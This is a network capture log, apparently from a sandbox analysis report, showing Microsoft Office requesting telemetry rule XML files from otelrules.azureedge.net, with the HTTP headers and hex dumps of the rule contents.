                                                                                                                                                                                                                                            x-ms-request-id: 94736f86-d01e-0082-21a1-34e489000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120230Z-r178fb8d765mjvjchC1DFWhkyn00000002bg0000000072mk
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC192OUTGET /rules/rule703100v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:04 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEBCD5699"
                                                                                                                                                                                                                                            x-ms-request-id: 90f2f108-d01e-0014-64d2-2ced58000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120255Z-16547b76f7fljddfhC1DFWeqbs00000000eg000000007a7n
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 31 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 41 54 53 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 41 54 53 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703100" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            45192.168.2.44980013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:30 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                            x-ms-request-id: 6bd3c087-001e-000b-13fd-2c15a7000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120230Z-16547b76f7fcjqqhhC1DFWrrrc0000000kkg000000007300
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:30 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:54 UTC192OUTGET /rules/rule703101v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE0F93037"
                                                                                                                                                                                                                                            x-ms-request-id: 0db1720b-401e-0035-2e6f-3582d8000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120255Z-1749fc9bdbdmg6wshC1DFWu2bc00000002e000000000cc20
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 31 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 41 54 53 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 41 54 53 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            46192.168.2.44980413.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:31 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                            x-ms-request-id: 764b7f95-c01e-00a1-1c00-2d7e4a000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120231Z-16547b76f7f7rtshhC1DFWrtqn0000000kmg000000008wp5
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC192OUTGET /rules/rule703601v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEE017060"
                                                                                                                                                                                                                                            x-ms-request-id: 7452a907-001e-00a2-640c-36d4d5000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120255Z-1749fc9bdbdmg6wshC1DFWu2bc00000002e000000000cc3a
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 36 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 61 6b 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 61 6b 65
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703601" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Maker.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMake


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            47192.168.2.44980513.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:31 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                            x-ms-request-id: 75035ba1-b01e-005c-42fb-2c4c66000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120231Z-16547b76f7f67wxlhC1DFWah9w0000000kmg0000000062wc
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC192OUTGET /rules/rule703600v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE7B46FC9"
                                                                                                                                                                                                                                            x-ms-request-id: f116fae9-001e-000b-54a8-3415a7000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120255Z-1749fc9bdbd4dqj6hC1DFWr4n400000002mg000000001kz5
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 36 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 61 6b 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 61 6b 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703600" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Maker" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMaker" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            48192.168.2.44980313.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:31 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                            x-ms-request-id: cc46dee9-d01e-007a-0efd-2cf38c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120231Z-16547b76f7fvllnfhC1DFWxkg80000000krg000000001qt9
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC192OUTGET /rules/rule702900v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1374
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE539933F"
                                                                                                                                                                                                                                            x-ms-request-id: 81d33667-f01e-0085-7cd2-2c88ea000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120255Z-16547b76f7fkj7j4hC1DFW0a9g0000000kf000000000esq8
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
